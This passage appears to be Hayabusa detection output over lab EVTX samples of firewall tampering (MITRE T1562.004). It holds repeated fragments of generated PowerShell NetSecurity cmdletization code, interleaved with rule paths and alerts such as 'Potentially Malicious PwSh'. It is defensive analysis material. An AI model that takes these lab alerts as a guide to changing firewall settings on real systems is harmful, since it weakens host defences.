'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolic",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,y'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine},../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,y'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 